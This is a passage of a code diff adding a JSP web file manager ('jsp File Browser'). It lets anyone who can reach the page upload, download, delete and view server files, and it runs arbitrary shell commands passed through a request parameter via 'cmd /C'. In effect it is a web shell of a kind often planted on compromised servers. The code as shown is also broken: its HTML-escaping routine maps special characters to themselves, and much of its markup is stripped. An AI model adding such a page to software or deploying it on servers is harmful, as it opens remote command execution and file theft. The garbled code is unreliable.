final int EDITFIELD_COLS = 85; + //The number of rows for the edit field + private static final int EDITFIELD_ROWS = 30; + //Open a new window to view a file + private static final boolean USE_POPUP = true; + /** + * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be + * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries. + * This can yield to performance issues. Turn it off, if the directory loads to slow. + */ + private static final boolean USE_DIR_PREVIEW = false; + private static final int DIR_PREVIEW_NUMBER = 10; + /** + * The name of an optional CSS Stylesheet file + */ + private static final String CSS_NAME = "Browser.css"; + /** + * The compression level for zip file creation (0-9) + * 0 = No compression + * 1 = Standard compression (Very fast) + * ... 
+ * 9 = Best compression (Very slow) + */ + private static final int COMPRESSION_LEVEL = 1; + /** + * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the + * server runs on a windows platform, to avoid a message box, if you try to access + * an empty removable drive (See KNOWN BUGS in Readme.txt). + */ + private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; + + /** + * Command of the shell interpreter and the parameter to run a programm + */ + private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows + //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix + + /** + * Max time in ms a process is allowed to run, before it will be terminated + */ + private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds + + //Button names + private static final String SAVE_AS_ZIP = "Download selected files as (z)ip"; + private static final String RENAME_FILE = "(R)ename File"; + private static final String DELETE_FILES = "(Del)ete selected files"; + private static final String CREATE_DIR = "Create (D)ir"; + private static final String CREATE_FILE = "(C)reate File"; + private static final String MOVE_FILES = "(M)ove Files"; + private static final String COPY_FILES = "Cop(y) Files"; + private static final String LAUNCH_COMMAND = "(L)aunch external program"; + private static final String UPLOAD_FILES = "Upload"; + + //Normally you should not change anything after this line + //---------------------------------------------------------------------------------- + //Change this to locate the tempfile directory for upload (not longer needed) + private static String tempdir = "."; + private static String VERSION_NR = "1.2"; + private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); + + public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + 
starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? 
"0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } + } + + public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } + } + + // A Class with methods used to process a ServletInputStream + public class HttpMultiPartParser { + + //private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + 
line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if 
(skipBlankLine) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ }
+ if (!isFile) {
+ line = getLine(is);
+ if (line == null) return dataTable;
+ dataTable.put(paramName, line);
+ // If parameter is dir, change saveInDir to dir
+ if (paramName.equals("dir")) saveInDir = line;
+ line = getLine(is);
+ continue;
+ }
+ try {
+ UplInfo uplInfo = new UplInfo(clength);
+ UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+ OutputStream os = null;
+ String path = null;
+ if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+ fileInfo.clientFileName));
+ else os = new ByteArrayOutputStream(ONE_MB);
+ boolean readingContent = true;
+ byte previousLine[] = new byte[2 * ONE_MB];
+ byte temp[] = null;
+ byte currentLine[] = new byte[2 * ONE_MB];
+ int read, read3;
+ if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+ line = null;
+ break;
+ }
+ while (readingContent) {
+ if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+ line = null;
+ uplInfo.aborted = true;
+ break;
+ }
+ if (compareBoundary(boundary, currentLine)) {
+ os.write(previousLine, 0, read - 2);
+ line = new String(currentLine, 0, read3);
+ break;
+ }
+ else {
+ os.write(previousLine, 0, read);
+ uplInfo.currSize += read;
+ temp = currentLine;
+ currentLine = previousLine;
+ previousLine = temp;
+ read = read3;
+ }//end else
+ }//end while
+ os.flush();
+ os.close();
+ if (!saveFiles) {
+ ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+ fileInfo.setFileContents(baos.toByteArray());
+ }
+ else fileInfo.file = new File(path);
+ dataTable.put(paramName, fileInfo);
+ uplInfo.currSize = uplInfo.totalSize;
+ }//end try
+ catch (IOException e) {
+ throw e;
+ }
+ }
+ return dataTable;
+ }
+
+ /**
+ * Compares boundary string to byte array
+ */
+ private boolean compareBoundary(String boundary, byte ba[]) {
+ if (boundary == null || ba == null) return false;
+ for (int i = 0; i < boundary.length(); i++)
+ if ((byte) boundary.charAt(i) != ba[i]) return false;
+ return true;
+ }
+
+ /** Convenience method to read HTTP header lines */
+ private synchronized String getLine(ServletInputStream sis) throws IOException {
+ byte b[] = new byte[1024];
+ int read = sis.readLine(b, 0, b.length), index;
+ String line = null;
+ if (read != -1) {
+ line = new String(b, 0, read);
+ if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+ }
+ return line;
+ }
+
+ public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+ String path = null;
+ if (dir == null || fileName == null) throw new IllegalArgumentException(
+ "dir or fileName is null");
+ int index = fileName.lastIndexOf('/');
+ String name = null;
+ if (index >= 0) name = fileName.substring(index + 1);
+ else name = fileName;
+ index = name.lastIndexOf('\\');
+ if (index >= 0) fileName = name.substring(index + 1);
+ path = dir + File.separator + fileName;
+ if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+ else return path.replace('/', File.separatorChar);
+ }
+ } //End of class HttpMultiPartParser
+
+ /**
+ * This class is a comparator to sort the filenames and dirs
+ */
+ class FileComp implements Comparator {
+
+ int mode;
+ int sign;
+
+ FileComp() {
+ this.mode = 1;
+ this.sign = 1;
+ }
+
+ /**
+ * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
+ * The default sorting method is by Name
+ * Negative mode means descending sort
+ */
+ FileComp(int mode) {
+ if (mode < 0) {
+ this.mode = -mode;
+ sign = -1;
+ }
+ else {
+ this.mode = mode;
+ this.sign = 1;
+ }
+ }
+
+ public int compare(Object o1, Object o2) {
+ File f1 = (File) o1;
+ File f2 = (File) o2;
+ if (f1.isDirectory()) {
+ if (f2.isDirectory()) {
+ switch (mode) {
+ //Filename or Type
+ case 1:
+ case 4:
+ return sign
+ * f1.getAbsolutePath().toUpperCase().compareTo(
+ f2.getAbsolutePath().toUpperCase());
+ //Filesize
+ case 2:
+ return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+ //Date
+ case 3:
+ return sign
+ * (new Long(f1.lastModified())
+ .compareTo(new Long(f2.lastModified())));
+ default:
+ return 1;
+ }
+ }
+ else return -1;
+ }
+ else if (f2.isDirectory()) return 1;
+ else {
+ switch (mode) {
+ case 1:
+ return sign
+ * f1.getAbsolutePath().toUpperCase().compareTo(
+ f2.getAbsolutePath().toUpperCase());
+ case 2:
+ return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+ case 3:
+ return sign
+ * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
+ case 4: { // Sort by extension
+ int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
+ int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
+ if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
+ return sign
+ * f1.getAbsolutePath().toUpperCase().compareTo(
+ f2.getAbsolutePath().toUpperCase());
+ }
+ // f1 has no extension
+ else if (tempIndexf1 == -1) return -sign;
+ // f2 has no extension
+ else if (tempIndexf2 == -1) return sign;
+ // Both have an extension
+ else {
+ String tempEndf1 = f1.getAbsolutePath().toUpperCase()
+ .substring(tempIndexf1);
+ String tempEndf2 = f2.getAbsolutePath().toUpperCase()
+ .substring(tempIndexf2);
+ return sign * tempEndf1.compareTo(tempEndf2);
+ }
+ }
+ default:
+ return 1;
+ }
+ }
+ }
+ }
+
+ /**
+ * Wrapperclass to wrap an OutputStream around a Writer
+ */
+ class Writer2Stream extends OutputStream {
+
+ Writer out;
+
+ Writer2Stream(Writer w) {
+ super();
+ out = w;
+ }
+
+ public void write(int i) throws IOException {
+ out.write(i);
+ }
+
+ public void write(byte[] b) throws IOException {
+ for (int i = 0; i < b.length; i++) {
+ int n = b[i];
+ //Convert byte to ubyte
+ n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+ out.write(n);
+ }
+ }
+
+ public void write(byte[] b, int off, int len) throws IOException {
+ for (int i = off; i < off + len; i++) {
+ int n = b[i];
+ n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+ out.write(n);
+ }
+ }
+ } //End of class Writer2Stream
+
+ static Vector expandFileList(String[] files, boolean inclDirs) {
+ Vector v = new Vector();
+ if (files == null) return v;
+ for (int i = 0; i < files.length; i++)
+ v.add(new File(URLDecoder.decode(files[i])));
+ for (int i = 0; i < v.size(); i++) {
+ File f = (File) v.get(i);
+ if (f.isDirectory()) {
+ File[] fs = f.listFiles();
+ for (int n = 0; n < fs.length; n++)
+ v.add(fs[n]);
+ if (!inclDirs) {
+ v.remove(i);
+ i--;
+ }
+ }
+ }
+ return v;
+ }
+
+ /**
+ * Method to build an absolute path
+ * @param dir the root dir
+ * @param name the name of the new directory
+ * @return if name is an absolute directory, returns name, else returns dir+name
+ */
+ static String getDir(String dir, String name) {
+ if (!dir.endsWith(File.separator)) dir = dir + File.separator;
+ File mv = new File(name);
+ String new_dir = null;
+ if (!mv.isAbsolute()) {
+ new_dir = dir + name;
+ }
+ else new_dir = name;
+ return new_dir;
+ }
+
+ /**
+ * This Method converts a byte size in a kbytes or Mbytes size, depending on the size
+ * @param size The size in bytes
+ * @return String with size and unit
+ */
+ static String convertFileSize(long size) {
+ int divisor = 1;
+ String unit = "bytes";
+ if (size >= 1024 * 1024) {
+ divisor = 1024 * 1024;
+ unit = "MB";
+ }
+ else if (size >= 1024) {
+ divisor = 1024;
+ unit = "KB";
+ }
+ if (divisor == 1) return size / divisor + " " + unit;
+ String aftercomma = "" + 100 * (size % divisor) / divisor;
+ if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
+ return size / divisor + "." + aftercomma + " " + unit;
+ }
+
+ /**
+ * Copies all data from in to out
+ * @param in the input stream
+ * @param out the output stream
+ * @param buffer copy buffer
+ */
+ static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
+ copyStreamsWithoutClose(in, out, buffer);
+ in.close();
+ out.close();
+ }
+
+ /**
+ * Copies all data from in to out
+ * @param in the input stream
+ * @param out the output stream
+ * @param buffer copy buffer
+ */
+ static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
+ throws IOException {
+ int b;
+ while ((b = in.read(buffer)) != -1)
+ out.write(buffer, 0, b);
+ }
+
+ /**
+ * Returns the Mime Type of the file, depending on the extension of the filename
+ */
+ static String getMimeType(String fName) {
+ fName = fName.toLowerCase();
+ if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
+ else if (fName.endsWith(".gif")) return "image/gif";
+ else if (fName.endsWith(".pdf")) return "application/pdf";
+ else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
+ else if (fName.endsWith(".avi")) return "video/x-msvideo";
+ else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
+ else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
+ else if (fName.endsWith(".zip")) return "application/zip";
+ else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
+ else if (fName.endsWith(".rtf")) return "application/rtf";
+ else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
+ else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
+ || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
+ || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
+ else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
+ else if (fName.endsWith(".png")) return "image/png";
+ else if (fName.endsWith(".xml")) return "text/xml";
+ else if (fName.endsWith(".svg")) return "image/svg+xml";
+ else if (fName.endsWith(".mp3")) return "audio/mp3";
+ else if (fName.endsWith(".ogg")) return "audio/ogg";
+ else return "text/plain";
+ }
+
+ /**
+ * Converts some important chars (int) to the corresponding html string
+ */
+ static String conv2Html(int i) {
+ if (i == '&') return "&";
+ else if (i == '<') return "<";
+ else if (i == '>') return ">";
+ else if (i == '"') return """;
+ else return "" + (char) i;
+ }
+
+ /**
+ * Converts a normal string to a html conform string
+ */
+ static String conv2Html(String st) {
+ StringBuffer buf = new StringBuffer();
+ for (int i = 0; i < st.length(); i++) {
+ buf.append(conv2Html(st.charAt(i)));
+ }
+ return buf.toString();
+ }
+
+ /**
+ * Starts a native process on the server
+ * @param command the command to start the process
+ * @param dir the dir in which the process starts
+ */
+ static String startProcess(String command, String dir) throws IOException {
+ StringBuffer ret = new StringBuffer();
+ String[] comm = new String[3];
+ comm[0] = COMMAND_INTERPRETER[0];
+ comm[1] = COMMAND_INTERPRETER[1];
+ comm[2] = command;
+ long start = System.currentTimeMillis();
+ try {
+ //Start process
+ Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
+ //Get input and error streams
+ BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
+ BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
+ boolean end = false;
+ while (!end) {
+ int c = 0;
+ while ((ls_err.available() > 0) && (++c <= 1000)) {
+ ret.append(conv2Html(ls_err.read()));
+ }
+ c = 0;
+ while ((ls_in.available() > 0) && (++c <= 1000)) {
+ ret.append(conv2Html(ls_in.read()));
+ }
+ try {
+ ls_proc.exitValue();
+ //if the process has not finished, an
exception is thrown + //else + while (ls_err.available() > 0) + ret.append(conv2Html(ls_err.read())); + while (ls_in.available() > 0) + ret.append(conv2Html(ls_in.read())); + end = true; + } + catch (IllegalThreadStateException ex) { + //Process is running + } + //The process is not allowed to run longer than given time. + if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { + ls_proc.destroy(); + end = true; + ret.append("!!!! Process has timed out, destroyed !!!!!"); + } + try { + Thread.sleep(50); + } + catch (InterruptedException ie) {} + } + } + catch (IOException e) { + ret.append("Error: " + e); + } + return ret.toString(); + } + + /** + * Converts a dir string to a linked dir string + * @param dir the directory string (e.g. /usr/local/httpd) + * @param browserLink web-path to Browser.jsp + */ + static String dir2linkdir(String dir, String browserLink, int sortMode) { + File f = new File(dir); + StringBuffer buf = new StringBuffer(); + while (f.getParentFile() != null) { + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); + } + else buf.insert(0, conv2Html(f.getName()) + File.separator); + f = f.getParentFile(); + } + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); + } + else buf.insert(0, f.getAbsolutePath()); + return buf.toString(); + } + + /** + * Returns true if the given filename tends towards a packed file + */ + static boolean isPacked(String name, boolean gz) { + return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") + || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() + .endsWith(".war")); + } + + /** + * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not + */ + static boolean isAllowed(File path, boolean write) throws IOException{ + if (READ_ONLY && write) return false; + if 
(RESTRICT_BROWSING) { + StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); + while (stk.hasMoreTokens()){ + if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) + return RESTRICT_WHITELIST; + } + return !RESTRICT_WHITELIST; + } + else return true; + } + + //--------------------------------------------------------------------------------------------------------------- + + %> +<% + //Get the current browsing directory + request.setAttribute("dir", request.getParameter("dir")); + // The browser_name variable is used to keep track of the URI + // of the jsp file itself. It is used in all link-backs. + final String browser_name = request.getRequestURI(); + final String FOL_IMG = ""; + boolean nohtml = false; + boolean dir_view = true; + //Get Javascript + if (request.getParameter("Javascript") != null) { + dir_view = false; + nohtml = true; + //Tell the browser that it should cache the javascript + response.setHeader("Cache-Control", "public"); + Date now = new Date(); + SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US); + response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2))); + response.setHeader("Content-Type", "text/javascript"); + %> + <%// This section contains the Javascript used for interface elements %> + var check = false; + <%// Disables the checkbox feature %> + function dis(){check = true;} + + var DOM = 0, MS = 0, OP = 0, b = 0; + <%// Determine the browser type %> + function CheckBrowser(){ + if (b == 0){ + if (window.opera) OP = 1; + // Moz or Netscape + if(document.getElementById) DOM = 1; + // Micro$oft + if(document.all && !OP) MS = 1; + b = 1; + } + } + <%// Allows the whole row to be selected %> + function selrow (element, i){ + var erst; + CheckBrowser(); + if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild; + else if (DOM==1) erst = element.firstChild.nextSibling.firstChild; + <%// MouseIn %> + if (i==0){ + if (erst.checked == true) 
element.className='mousechecked'; + else element.className='mousein'; + } + <%// MouseOut %> + else if (i==1){ + if (erst.checked == true) element.className='checked'; + else element.className='mouseout'; + } + <% // MouseClick %> + else if ((i==2)&&(!check)){ + if (erst.checked==true) element.className='mousein'; + else element.className='mousechecked'; + erst.click(); + } + else check=false; + } + <%// Filter files and dirs in FileList%> + function filter (begriff){ + var suche = begriff.value.toLowerCase(); + var table = document.getElementById("filetable"); + var ele; + for (var r = 1; r < table.rows.length; r++){ + ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,""); + if (ele.toLowerCase().indexOf(suche)>=0 ) + table.rows[r].style.display = ''; + else table.rows[r].style.display = 'none'; + } + } + <%//(De)select all checkboxes%> + function AllFiles(){ + for(var x=0;x < document.FileList.elements.length;x++){ + var y = document.FileList.elements[x]; + var ytr = y.parentNode.parentNode; + var check = document.FileList.selall.checked; + if(y.name == 'selfile' && ytr.style.display != 'none'){ + if (y.disabled != true){ + y.checked = check; + if (y.checked == true) ytr.className = 'checked'; + else ytr.className = 'mouseout'; + } + } + } + } + + function shortKeyHandler(_event){ + if (!_event) _event = window.event; + if (_event.which) { + keycode = _event.which; + } else if (_event.keyCode) { + keycode = _event.keyCode; + } + var t = document.getElementById("text_Dir"); + //z + if (keycode == 122){ + document.getElementById("but_Zip").click(); + } + //r, F2 + else if (keycode == 113 || keycode == 114){ + var path = prompt("Please enter new filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Ren").click(); + } + //c + else if (keycode == 99){ + var path = prompt("Please enter filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NFi").click(); + } + //d + else if (keycode == 
100){ + var path = prompt("Please enter directory name", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NDi").click(); + } + //m + else if (keycode == 109){ + var path = prompt("Please enter move destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Mov").click(); + } + //y + else if (keycode == 121){ + var path = prompt("Please enter copy destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Cop").click(); + } + //l + else if (keycode == 108){ + document.getElementById("but_Lau").click(); + } + //Del + else if (keycode == 46){ + document.getElementById("but_Del").click(); + } + } + + function popUp(URL){ + fname = document.getElementsByName("myFile")[0].value; + if (fname != "") + window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes") + } + + document.onkeypress = shortKeyHandler; +<% } + // View file + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)) { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); + } + else if (f.exists() && f.canRead()) { + if (isPacked(f.getName(), false)) { + //If zipFile, do nothing here + } + else{ + String mimeType = getMimeType(f.getName()); + response.setContentType(mimeType); + if (mimeType.equals("text/plain")) response.setHeader( + "Content-Disposition", "inline;filename=\"temp.txt\""); + else response.setHeader("Content-Disposition", "inline;filename=\"" + + f.getName() + "\""); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + 
} + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + // Download selected files as zip file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { + Vector v = expandFileList(request.getParameterValues("selfile"), false); + //Check if all files in vector are allowed + String notAllowedFile = null; + for (int i = 0;i < v.size(); i++){ + File f = (File) v.get(i); + if (!isAllowed(f, false)){ + notAllowedFile = f.getAbsolutePath(); + break; + } + } + if (notAllowedFile != null){ + request.setAttribute("error", "You are not allowed to access " + notAllowedFile); + } + else if (v.size() == 0) { + request.setAttribute("error", "No files selected"); + } + else { + File dir_file = new File("" + request.getAttribute("dir")); + int dir_l = dir_file.getAbsolutePath().length(); + response.setContentType("application/zip"); + response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); + out.clearBuffer(); + ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); + zipout.setComment("Created by jsp File Browser v. 
" + VERSION_NR); + zipout.setLevel(COMPRESSION_LEVEL); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.canRead()) { + zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); + BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[0xffff]; + copyStreamsWithoutClose(fr, zipout, buffer); + /* int b; + while ((b=fr.read())!=-1) zipout.write(b);*/ + fr.close(); + zipout.closeEntry(); + } + } + zipout.finish(); + out.flush(); + nohtml = true; + dir_view = false; + } + } + // Download file + else if (request.getParameter("downfile") != null) { + String filePath = request.getParameter("downfile"); + File f = new File(filePath); + if (!isAllowed(f, false)){ + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); + } + else if (f.exists() && f.canRead()) { + response.setContentType("application/octet-stream"); + response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() + + "\""); + response.setContentLength((int) f.length()); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + if (nohtml) return; + //else + // If no parameter is submitted, it will take the path from jsp file browser + if (request.getAttribute("dir") == null) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) { + File f = new File(application.getRealPath(request.getRequestURI())).getParentFile(); + //This is a hack needed for tomcat + 
while (f != null && !f.exists()) + f = f.getParentFile(); + if (f != null) + path = f.getAbsolutePath(); + } + if (path == null) { // handle the case where we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + } + //Check path + if (!isAllowed(new File(path), false)){ + //TODO Blacklist + if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; + else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); + } + request.setAttribute("dir", path); + }%> + + + + + + + +<% + //If a cssfile exists, it will take it + String cssPath = null; + if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( + application.getRealPath(request.getRequestURI())).getParent() + + File.separator + CSS_NAME; + if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); + if (new File(cssPath).exists()) { +%> + + <%} + else if (request.getParameter("uplMonitor") == null) {%> + + <%} + + //Check path + if (!isAllowed(new File((String)request.getAttribute("dir")), false)){ + request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); + } + //Upload monitor + else if (request.getParameter("uplMonitor") != null) {%> + <% + String fname = request.getParameter("uplMonitor"); + //First opening + boolean first = false; + if (request.getParameter("first") != null) first = true; + UplInfo info = new UplInfo(); + if (!first) { + info = UploadMonitor.getInfo(fname); + if (info == null) { + //Windows + int posi = fname.lastIndexOf("\\"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + if (info == null) { + //Unix + int posi = fname.lastIndexOf("/"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + } + dir_view = false; + request.setAttribute("dir", null); + if (info.aborted) { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload aborted. +<% + } + else if (info.totalSize != info.currSize || info.currSize == 0) { + %> + + + +Upload of <%=fname%>

    +
    + + +
    +<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    +Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> + +<% + } + else { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload finished. + +<% + } + } + //Comandwindow + else if (request.getParameter("command") != null) { + if (!NATIVE_COMMANDS){ + request.setAttribute("error", "Execution of native commands is not allowed!"); + } + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { +%> +Launch commands in <%=request.getAttribute("dir")%> + +
    +

    <%=LAUNCH_COMMAND %>


    +<% + out.println("
    \n" + + " + "> +

    + + + +
    + Command: +
    + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
